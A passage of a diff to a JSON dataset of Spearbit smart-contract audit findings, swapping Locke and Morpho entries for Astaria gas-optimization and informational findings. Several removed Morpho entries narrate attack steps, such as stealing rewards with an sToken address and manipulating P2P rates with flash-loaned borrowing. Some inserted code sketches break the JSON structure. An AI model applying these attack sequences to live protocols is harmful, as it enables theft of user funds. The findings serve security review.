function file(File calldata incoming) public requiresAuth { This wastes gas, as if fileBatch()'s requiresAuth check passes, file()'s check will pass too (a refactoring sketch follows this block).", "labels": [ "Spearbit", - "Locke", + "Astaria", "Severity: Gas Optimization" ] }, { - "title": "Use calldata instead of memory for some function parameters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "Having function arguments in calldata instead of memory is more optimal in the aforementioned cases. See the following reference.", + "title": "_sliceUint can be optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "_sliceUint can be optimized", "labels": [ "Spearbit", - "Locke", + "Astaria", "Severity: Gas Optimization" ] }, { - "title": "Update cumulativeRewardPerToken only once after stream ends", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "Since cumulativeRewardPerToken does not change once it is updated after the stream ends, it has to be updated only once.", + "title": "Use basis points for ratios", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Fee ratios are represented through two state variables for numerator and denominator. A basis point system can be used in its place as it is simpler (denominator always set to 10_000) and gas efficient, as the denominator is now a constant.", "labels": [ "Spearbit", - "Locke", + "Astaria", "Severity: Gas Optimization" ] }, { - "title": "Expression 10**one can be unchecked", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "uint256 one = ERC20(depositToken).decimals(); if (one > 33) revert BadERC20Interaction(); depositDecimalsOne = uint112(10**one)", + "title": "No Need to Allocate Unused Variable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "LienToken._makePayment() returns two values: (Stack[] memory newStack, uint256 spent), but the second value is never read: (newStack, ) = _makePayment(_loadLienStorageSlot(), stack, amount); Also, if this value is planned to be used in the future, it's not a useful value. It is equal to the payment made to the last lien. A more meaningful quantity can be the total payment made to the entire stack. Additional instances noted in Context above.", "labels": [ "Spearbit", - "Locke", + "Astaria", "Severity: Gas Optimization" ] },
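For the fileBatch() finding above, a sketch of the suggested refactoring: perform the auth check once and route both endpoints through an internal helper. The _file helper is hypothetical; fileBatch/file signatures come from the finding:

    function fileBatch(File[] calldata files) external requiresAuth {
        for (uint256 i; i < files.length; ) {
            _file(files[i]);          // no second auth check per element
            unchecked { ++i; }
        }
    }

    function file(File calldata incoming) public requiresAuth {
        _file(incoming);
    }

    function _file(File calldata incoming) internal {
        // ... original file() logic, without the requiresAuth modifier ...
    }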
", "labels": [ "Spearbit", - "Locke", + "Astaria", "Severity: Gas Optimization" ] }, { - "title": "Simplifying code logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", - "body": "if (timestamp < lastUpdate) { return tokens; } uint32 acctTimeDelta = timestamp - lastUpdate; if (acctTimeDelta > 0) { uint256 streamAmt = uint256(acctTimeDelta) * tokens / (endStream - lastUpdate); return tokens - uint112(streamAmt); } else { return tokens; } 17 function currDepositTokensNotYetStreamed(IStream stream, address who) external view returns (uint256) { unchecked { uint32 timestamp = uint32(block.timestamp); (uint32 startTime, uint32 endStream, ,) = stream.streamParams(); if (block.timestamp >= endStream) return 0; ( uint256 lastCumulativeRewardPerToken, uint256 virtualBalance, uint112 rewards, uint112 tokens, uint32 lastUpdate, bool merkleAccess ) = stream.tokenStreamForAccount(address(who)); if (timestamp < lastUpdate) { return tokens; } uint32 acctTimeDelta = timestamp - lastUpdate; if (acctTimeDelta > 0) { uint256 streamAmt = uint256(acctTimeDelta) * tokens / (endStream - lastUpdate); return tokens - uint112(streamAmt); } else { return tokens; } } }", + "title": "RouterStorage.vaults can be a boolean mapping", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "RouterStorage.vaults is of type mapping(address => address). A key-value is stored in the mapping as: s.vaults[vaultAddr] = msg.sender; However, values in this mapping are only used to compare against address(0): if (_loadRouterSlot().vaults[msg.sender] == address(0)) { ... return _loadRouterSlot().vaults[vault] != address(0); It's better to have vaults as a boolean mapping, as the msg.sender value assigned to it doesn't carry any special meaning.", "labels": [ "Spearbit", - "Locke", - "Severity: Informational" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "Wrong P2P exchange rate calculation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "_p2pDelta is divided by _poolIndex and multiplied by _p2pRate, nevertheless it should have been multiplied by _poolIndex and divided by _p2pRate to compute the correct share of the delta.
This leads to wrong P2P rates throughout all markets if supply / borrow delta is involved.", + "title": "isValidReference() should just take an array element as input", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "isValidRefinance() takes the stack array as an argument but only uses stack[0] and stack[position]: function isValidRefinance( ILienToken.Lien calldata newLien, uint8 position, ILienToken.Stack[] calldata stack ) public view returns (bool) { The usage of stack[0] can be replaced with stack[position] as stack[0].lien.collateralId == stack[position].lien.collateralId: if (newLien.collateralId != stack[0].lien.collateralId) { revert InvalidRefinanceCollateral(newLien.collateralId); } To save gas, it can directly take that one element as input.", "labels": [ "Spearbit", - "Morpho", - "Severity: Critical Risk" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "MatchingEngineForAave is using the wrong totalSupply in updateBorrowers", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "_poolTokenAddress is referencing AToken so the totalStaked would be the total supply of the AToken. In this case, the totalStaked should reference the total supply of the DebtToken, otherwise the user would be rewarded for a wrong amount of reward.", + "title": "Functions can be made external", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "If a public function is not called from within the contract, it should be made external for clarity; this can also potentially save gas.", "labels": [ "Spearbit", - "Morpho", - "Severity: Critical Risk" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "RewardsManagerAave does not verify token addresses", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Aave has 3 different types of tokens: aToken, stable debt token and variable debt token (a/s/vToken). Aaves incentive controller can define rewards for all of them but Morpho never uses a stable-rate borrows token (sToken). The public accrueUserUnclaimedRewards function allows passing arbitrary token addresses for which to accrue user rewards. Current code assumes that if the token is not the variable debt token, then it must be the aToken, and uses the users supply balance for the reward calculation as follows: 5 uint256 stakedByUser = reserve.variableDebtTokenAddress == asset ? positionsManager.borrowBalanceInOf(reserve.aTokenAddress, _user).onPool : positionsManager.supplyBalanceInOf(reserve.aTokenAddress, _user).onPool; An attacker can accrue rewards by passing in an sToken address and steal from the contract, i.e: Attacker supplies a large amount of tokens for which sToken rewards are defined. The aToken reward index is updated to the latest index but the sToken index is not initialized. Attacker calls accrueUserUnclaimedRewards([sToken]), which will compute the difference between the cur- rent Aave reward index and users sToken index, then multiply it by their supply balance. The user accumulated rewards in userUnclaimedRewards[user] can be withdrawn by calling PositionMan- ager.claimRewards([sToken, ...]). Attacker withdraws their supplied tokens again.
The abovementioned steps can be performed in one single transaction to steal unclaimed rewards from all Morpho positions.", + "title": "a.mulDivDown(b,1) is equivalent to a*b", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The highlighted code above follows the pattern a.mulDivDown(b, 1), which is equivalent to a*b.", "labels": [ "Spearbit", - "Morpho", - "Severity: Critical Risk" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "FullMath requires overflow behavior", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "UniswapV3s FullMath.sol is copied and migrated from an old solidity version to version 0.8 which reverts on overflows but the old FullMath relies on the implicit overflow behavior. The current code will revert on overflows when it should not, breaking the SwapManagerUniV3 contract.", + "title": "Use scratch space for keccak", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The computeId() function computes and returns uint256(keccak256(abi.encodePacked(token, tokenId))). Since the data being hashed fits within 2 memory slots, scratch space can be used to avoid paying gas cost on memory expansion.", "labels": [ "Spearbit", - "Morpho", - "Severity: High Risk" + "Astaria", + "Severity: Gas Optimization" ] }, { - "title": "Morphos USDT mainnet market can end up in broken state", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Note that USDT on Ethereum mainnet is non-standard and requires resetting the approval to zero (see USDT L199) before being able to change it again. In _repayERC20ToPool , it could be that _amount is approved but then _amount = Math.min(...) only repays a smaller amount, meaning there remains a non-zero approval for Aave. Any further _repayERC20ToPool/_- supplyERC20ToPool calls will then revert in the approve call. Users cannot interact with most functions of the Morpho USDT market anymore. Example: Assume the attacker is first to borrow from the USDT market on Morpho. Attacker borrows 1000 USDT through Morpho from the Aave pool (and some other collateral to cover the debt). Attacker directly interacts with Aave to repay 1 USDT of debt for Aaves Morpho account position. Attacker attempts to repay 1000 USDT on Morpho. the contracts debt balance is only 999 and the _amount = Math.min(_amount, variableDebtTo- ken.scaledBalanceOf(address(this)).mulWadByRay(_normalizedVariableDebt) computation will only repay 999. An approval of 1 USDT remains. It will approve 1000 USDT but The USDT market is broken as it reverts on supply / repay calls when trying to approve the new amount", + "title": "Define a named constant for the return value of onFlashAction", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "onFlashAction returns: keccak256(\"FlashAction.onFlashAction\")", "labels": [ "Spearbit", - "Morpho", - "Severity: High Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Wrong reserve factor computation on P2P rates", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "The reserve factor is taken on the entire P2P supply and borrow rates instead of just on the spread of the pool rates.
Its currently overcharging suppliers and borrowers and making it possible to earn a worse rate on Morpho than the pool rates. supplyP2PSPY[_marketAddress] = (meanSPY * (MAX_BASIS_POINTS - reserveFactor[_marketAddress])) / MAX_BASIS_POINTS; borrowP2PSPY[_marketAddress] = (meanSPY * (MAX_BASIS_POINTS + reserveFactor[_marketAddress])) / MAX_BASIS_POINTS;", + "title": "Define a named constant for permit typehash in ERC20-cloned", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In permit, the following type hash has been used: keccak256( \"Permit(address owner,address spender,uint256 value,uint256 nonce,uint256 deadline)\" )", "labels": [ "Spearbit", - "Morpho", - "Severity: High Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "SwapManager assumes Morpho token is token0 of every token pair", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "The consult function wrongly assumes that the Morpho token is always the first token (token0) in the Morpho <> Reward token token pair. This could lead to inverted prices and a denial of service attack when claiming rewards as the wrongly calculated expected amount slippage check reverts.", + "title": "Unused struct, enum and storage fields can be removed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The struct, enum and storage fields in this context have not been used in the project.", "labels": [ "Spearbit", - "Morpho", - "Severity: High Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "SwapManager fails at updating TWAP", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "The update function returns early without updating the TWAP if the elapsed time is past the TWAP period. Meaning, once the TWAP period passed the TWAP is stale and forever represents an old value. This could lead to a denial of service attack when claiming rewards as the wrongly calculated expected amount slippage check reverts.", + "title": "WPStorage.expected's comment can be made more accurate", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In WPStorage's definition we have: uint88 expected; // Expected value of auctioned NFTs. yIntercept (virtual assets) of a PublicVault are not modified on liquidation, only once an auction is completed. The comment for expected is not exactly accurate. The accumulated value in expected is the sum of all auctioned NFTs' amountOwed at the timestamp when the liquidate function gets called, whereas the NFTs get auctioned starting from their first stack element's liquidationInitialAsk down to 1_000 wei.", "labels": [ "Spearbit", - "Morpho", - "Severity: High Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "P2P rate can be manipulated as its a lazy-updated snapshot", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "The P2P rate is lazy-updated upon interactions with the Morpho protocol. It takes the mid-rate of Its possible to manipulate these rates before triggering an update on the current Aave supply and borrow rate. Morpho.
function _updateSPYs(address _marketAddress) internal { DataTypes.ReserveData memory reserveData = lendingPool.getReserveData( IAToken(_marketAddress).UNDERLYING_ASSET_ADDRESS() ); uint256 meanSPY = Math.average( reserveData.currentLiquidityRate, reserveData.currentVariableBorrowRate ) / SECONDS_PER_YEAR; // In ray } Example: Assume an attacker has a P2P supply position on Morpho and wants to earn a very high APY on it. He does the following actions in a single transaction: Borrow all funds on the desired Aave market. (This can be done by borrowing against flashloaned collateral). The utilisation rate of the market is now 100%. The borrow rate is the max borrow rate and the supply rate is (1.0 - reserveFactor) * maxBorrowRate. The max borrow rate can be higher than 100% APY, see Aave docs. The attacker triggers an update to the P2P rate, for example, by supplying 1 token to the pool Positions- ManagerForAave.supply(poolTokenAddress, 1, ...), triggering marketsManager.updateSPYs(_poolTo- kenAddress). The new mid-rate is computed which will be (2.0 - reserveFactor) * maxBorrowRate / 2 ~ maxBor- rowRate. The attacker repays their Aave debt in the same transaction, not paying any interest on it. All P2P borrowers now pay the max borrow rate to the P2P suppliers until the next time a user interacts with the market on Morpho. This process can be repeated to keep the APY high.", + "title": "Leave comment that in WithdrawProxy.claim() the calculation of balance cannot underflow", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The following line in claim() initialises balance: uint256 balance = ERC20(asset()).balanceOf(address(this)) - s.withdrawReserveReceived; With the current PublicVault implementation of IPublicVault, this cannot underflow since the increase in withdrawReserveReceived (using increaseWithdrawReserveReceived) is synced with increasing the asset balance by the same amount.", "labels": [ "Spearbit", - "Morpho", - "Severity: High Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Liquidating Morphos Aave position leads to state desynchronization", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Morpho has a single position on Aave that encompasses all of Morphos individual user positions that are on the pool. When this Aave Morpho position is liquidated the user position state tracked in Morpho desynchronize from the actual Aave position. This leads to issues when users try to withdraw their collateral or repay their debt from Morpho. Its also possible to double-liquidate for a profit. Example: Theres a single borrower B1 on Morpho who is connected to the Aave pool. B1 supplies 1 ETH and borrows 2500 DAI. This creates a position on Aave for Morpho The ETH price crashes and the position becomes liquidatable. A liquidator liquidates the position on Aave, earning the liquidation bonus. They repaid some debt and seized some collateral for profit. This repaid debt / removed collateral is not synced with Morpho. The users supply and debt balance remain 1 ETH and 2500 DAI. The same user on Morpho can be liquidated again because Morpho uses the exact same liquidation parameters as Aave. The Morpho liquidation call again repays debt on the Aave position and withdraws collateral with a second liquidation bonus.
The state remains desynced.", + "title": "Shared logic in withdraw and redeem functions of WithdrawProxy can be turned into a shared modifier", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "withdraw and redeem both start with the following lines: WPStorage storage s = _loadSlot(); // If auction funds have been collected to the WithdrawProxy // but the PublicVault hasn't claimed its share, too much money will be sent to LPs if (s.finalAuctionEnd != 0) { // if finalAuctionEnd is 0, no auctions were added revert InvalidState(InvalidStates.NOT_CLAIMED); } Since they have this shared logic at the beginning of their body, we can consolidate the logic into a modifier.", "labels": [ "Spearbit", - "Morpho", - "Severity: High Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Frontrunners can exploit the system by not allowing head of DLL to match in P2P", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "For a given asset X, liquidity is supplied on the pool since there are not enough borrowers. suppli- ersOnPool head: 0xa with 1000 units of x Whenever there is a new transaction in the mempool to borrow 100 units of x: Frontrunner supplies 1001 units of x and is supplied on pool. updateSuppliers will place the frontrunner on the head (assuming very high gas is supplied). Borrowers transaction lands and is matched 100 units of x with a frontrunner in p2p. Frontrunner withdraws the remaining 901 left which was on the underlying pool. Favorable conditions for an attack: Relatively fewer gas fees & relatively high block gas limit. insertSorted is able to traverse to head within block gas limit (i.e length of DLL). Since this is a non-atomic sandwich, the frontrunner needs excessive capital for a blocks time period.", + "title": "StrategyDetails version can only be used in custom implementation of IStrategyValidator, requires documentation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "StrategyDetails.version is never used in the current implementations of the validators. If the intention is to avoid replays across different versions of Astaria, we should add a check for it in commitment validation functions. A custom implementation of IStrategyValidator can make use of this value, but this needs documentation as to exactly what it refers to.", "labels": [ "Spearbit", - "Morpho", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "TWAP intervals should be flexible as per market conditions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "The protocol is using the same TWAP_INTERVAL for both weth-morpho and weth-reward token pool while their liquidity and activity might be different.
It should use separate appropriate values for both pools.", + "title": "Define helper functions to tag different pieces of cloned data for ClearingHouse", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "_getArgAddress(0) and _getArgUint256(21) are used as the ROUTER() and COLLATERAL_ID() in the fallback implementation of ClearingHouse, which is a Clone-derived contract.", "labels": [ "Spearbit", - "Morpho", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "PositionsManagerForAave claimToTreasury could allow sending underlying to 0x address", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "claimToTreasury is currently not verifying if the treasuryVault address is != address(0). In the current state, it would allow the owner of the contract to burn the underlying token instead of sending it to the intended treasury address.", + "title": "A new modifier onlyVault() can be defined for WithdrawProxy to consolidate logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The following require statement has been used in multiple functions including increaseWithdrawReserveReceived, drain, setWithdrawRatio and handleNewLiquidation. require(msg.sender == VAULT(), \"only vault can call\");", "labels": [ "Spearbit", - "Morpho", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "rewardsManager used in MatchingEngineForAave could be not initialized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "MatchingEngineForAave update the userUnclaimedRewards for a supplier/borrower each time it gets updated. rewardsManager is not initialized in PositionsManagerForAaveLogic.initialize but only via Po- sitionsManagerForAaveGettersSetters.setRewardsManager, which means that it will start as address(0). Each time a supplier or borrower gets updated and the rewardsManager address is empty, the transaction will revert. To replicate the issue, just comment positionsManager.setRewardsManager(address(rewardsManager)); in TestSetup and run make c-TestSupply. All tests will fail with [FAIL. Reason: Address: low-level delegate call failed]", + "title": "Inconsistent pragma versions and floating pragma versions can be avoided", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Most contracts in the project use pragma solidity 0.8.17, but there are other variants as well: pragma solidity ^0.8.16; // src/Interfaces/IAstariaVaultBase.sol pragma solidity ^0.8.16; // src/Interfaces/IERC4626Base.sol pragma solidity ^0.8.16; // src/Interfaces/ITokenBase.sol pragma solidity ^0.8.15; // src/Interfaces/ICollateralToken.sol pragma solidity ^0.8.0; // src/Interfaces/IERC20.sol pragma solidity ^0.8.0; // src/Interfaces/IERC165.sol pragma solidity ^0.8.0; // src/Interfaces/IERC1155.sol pragma solidity ^0.8.0; // src/Interfaces/IERC1155Receiver.sol pragma solidity ^0.8.0; // src/Interfaces/IERC721Receiver.sol pragma solidity ^0.8.0; // src/utils/Math.sol pragma solidity >=0.8.0; // src/Interfaces/IERC721.sol pragma solidity >=0.8.0; // src/utils/MerkleProofLib.sol And they all have floating version pragmas. In hardhat.config.ts, solidity: \"0.8.13\" is used. In .prettierrc settings we have \"compiler\": \"0.8.17\". In .solhint.json we have \"compiler-version\": [\"error\", \"0.8.0\"]. foundry.toml does not have a solc setting. A sketch of a consistent setup follows.
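One way to make the toolchain consistent (a sketch, assuming 0.8.17 is the intended target version) is to pin a single compiler everywhere:

    // in every source file, pinned with no caret:
    pragma solidity 0.8.17;

    # foundry.toml (Foundry's solc setting; solc_version is an equivalent key)
    solc = "0.8.17"

hardhat.config.ts, .prettierrc and .solhint.json would then be aligned to the same version so that one compiler builds and lints the whole project.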
", "labels": [ "Spearbit", - "Morpho", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Missing input validation checks on contract initialize/constructor", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Contract creation/initialization of a contract in a wrong/inconsistent state. initialize/constructor input parameters should always be validated to prevent the", + "title": "IBeacon is missing a compiler version pragma", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "IBeacon is missing a compiler version pragma.", "labels": [ "Spearbit", - "Morpho", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Setting a new rewards manager breaks claiming old rewards", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Setting a new rewards manager will break any old unclaimed rewards as users can only claim through the PositionManager.claimRewards function which then uses the new reward manager.", + "title": "zone and zoneHash are not required for fully open Seaport orders", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "As per Seaport's documentation, zone and zoneHash are not required for PUBLIC orders: The zone of the order is an optional secondary account attached to the order with two additional privileges: The zone may cancel orders where it is named as the zone by calling cancel. (Note that offerers can also cancel their own orders, either individually or for all orders signed with their current counter at once by calling incrementCounter). \"Restricted\" orders (as specified by the order type) must either be executed by the zone or the offerer, or must be approved as indicated by a call to an isValidOrder or isValidOrderIncludingExtraData view function on the zone. This order isn't \"Restricted\", and there is no way to cancel a Seaport order once created from this contract.", "labels": [ "Spearbit", - "Morpho", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Low/high MaxGas values could make match/unmatch supplier/borrower functions always fail or revert", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "maxGas variable is used to determine how much gas the matchSuppliers, unmatchSuppliers, matchBorrowers and unmatchBorrowers can consume while trying to match/unmatch supplier/borrower and also updating their position if matched. maxGas = 0 will make entirely skip the loop. maxGas low would make the loop run at least one time but the smaller maxGas is the higher is the possibility that not all the available suppliers/borrowers are matched/unmatched. maxGas could make the loop consume all the block gas, making the tx revert. Note that maxGas can be overriden by the user when calling supply, borrow", + "title": "Inconsistent treatment of delegate setting", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Private vaults include delegate in the allow list when deployed through the Router. Public vaults do not. The VaultImplementation, when mutating a delegate, sets them on the allow list. A sketch of uniform treatment follows.
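One way to make the treatment uniform (a hypothetical shared-initializer sketch, not the project's exact source) would be to apply the same rule for private and public vaults at deployment:

    if (params.delegate != address(0)) {
        s.allowList[params.delegate] = true; // same allow-list rule regardless of vault type
    }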
", "labels": [ "Spearbit", - "Morpho", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "NDS min/max value should be properly validated to avoid tx to always fail/skip loop", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "PositionsManagerForAaveLogic is currently initialized with a default value of NDS = 20. The NDS value is used by MatchingEngineForAave when it needs to call DoubleLinkedList.insertSorted in both updateBorrowers and updateSuppliers updateBorrowers, updateSuppliers are called by MatchingEngineForAavematchBorrowers MatchingEngineForAaveunmatchBorrowers MatchingEngineForAavematchSuppliers MatchingEngineForAaveunmatchSuppliers Those functions and also directly updateBorrowers and updateSuppliers are also called by PositionsManager- ForAaveLogic Problems: A low NDS value would make the loop inside insertSorted exit early, increasing the probability of a sup- plier/borrower to be added to the tail of the list. This is something that Morpho would like to avoid because it would decrease protocol performance when it needs to match/unmatch suppliers/borrowers. In the case where a list is long enough, a very high value would make the tranaction revert each time one of those function directly or indirectly call insertSorted. The gas rail guard present in the match/unmatch supplier/borrow is useless because the loop would be called at least one time.", + "title": "AstariaRouter does not adhere to EIP1967 spec", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The Router serves as an implementation Beacon for proxy contracts; however, it does not adhere to the EIP1967 spec.", "labels": [ "Spearbit", - "Morpho", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Initial SwapManager cumulative prices values are wrong", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "The initial cumulative price values are integer divisions of unscaled reserves and not UQ112x112 fixed-point values. (reserve0, reserve1, blockTimestampLast) = pair.getReserves(); price0CumulativeLast = reserve1 / reserve0; price1CumulativeLast = reserve0 / reserve1; One of these values will (almost) always be zero due to integer division. Then, when the difference is taken to the real currentCumulativePrices in update, the TWAP will be a large, wrong value.
The slippage checks will not work correctly.", + "title": "Receiver of bought out lien must be approved by msg.sender", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The buyoutLien function requires that either the receiver of the lien is msg.sender or is an address approved by msg.sender: if (msg.sender != params.encumber.receiver) { require( _loadERC721Slot().isApprovedForAll[msg.sender][params.encumber.receiver] ); } This check seems unnecessary and in some cases will block users from buying out liens as intended.", "labels": [ "Spearbit", - "Morpho", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "User withdrawals can fail if Morpho position is close to liquidation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "When trying to withdraw funds from Morpho as a P2P supplier the last step of the withdrawal algorithm borrows an amount from the pool (\"hard withdraw\"). If Morphos position on Aaves debt / collateral value is higher than the markets maximum LTV ratio but lower than the markets liquidation threshold, the borrow will fail and the position cannot be liquidated. Therefore withdrawals could fail.", + "title": "A new modifier onlyLienToken() can be defined to refactor logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The following require statement has been used in multiple locations in PublicVault: require(msg.sender == address(LIEN_TOKEN())); Locations used: beforePayment afterPayment handleBuyoutLien updateAfterLiquidationPayment updateVaultAfterLiquidation", "labels": [ "Spearbit", - "Morpho", - "Severity: Medium Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Event Withdrawn is emitted using the wrong amounts of supplyBalanceInOf", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Inside the _withdraw function, all changes performed to supplyBalanceInOf are done using the _supplier address. The _receiver is correctly used only to transfer the underlying token via underlyingToken.safeTransfer(_- receiver, _amount); The Withdrawn event should be emitted passing the supplyBalanceInOf[_poolTokenAddress] of the supplier and not the receiver.
This problem will arise when this internal function is called by PositionsManagerForAave.liquidate where sup- plier (borrower in this case) and receiver (liquidator) would not be the same address.", + "title": "A redundant if block can be removed from PublicVault._afterCommitToLien", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In PublicVault._afterCommitToLien, we have the following if block: if (s.last == 0) { s.last = block.timestamp.safeCastTo40(); } This if block is redundant, since regardless of the value of s.last, a few lines before _accrue(s) would update the s.last to the current timestamp.", "labels": [ "Spearbit", - "Morpho", - "Severity: Low Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "_repayERC20ToPool is approving the wrong amount", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "_repayERC20ToPool is approving the amount of underlying token specified via the input parameter _amount when the correct amount that should be approved is the one calculated via: _amount = Math.min( _amount, variableDebtToken.scaledBalanceOf(address(this)).mulWadByRay(_normalizedVariableDebt) );", + "title": "Private vaults' deposit endpoints can be potentially simplified", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "A private vault's deposit function can be called directly or indirectly using the ROUTER() (either way by anyone) and we have the following require statement: require( s.allowList[msg.sender] || (msg.sender == address(ROUTER()) && s.allowList[receiver]) ); If the ROUTER() is the AstariaRouter implementation of IAstariaRouter, then it inherits from ERC4626RouterBase and ERC4626Router which allows anyone to call into deposit of this private vault using: depositToVault depositMax ERC4626RouterBase.deposit Thus if any one of the above functions is called through the ROUTER(), msg.sender == address(ROUTER()) will be true. Also, note that when private vaults are created using newVault, the msg.sender/owner along with the delegate are added to the allowList and the allow list is enabled. And since there is no bookkeeping here for the receiver beyond the require statement, that means: only the owner or the delegate of this private vault can call directly into deposit, or anyone else can set the to address parameter of one of those 3 endpoints above to the owner or delegate to deposit assets (wETH in the current implementation) into the private vault. All the assets can be 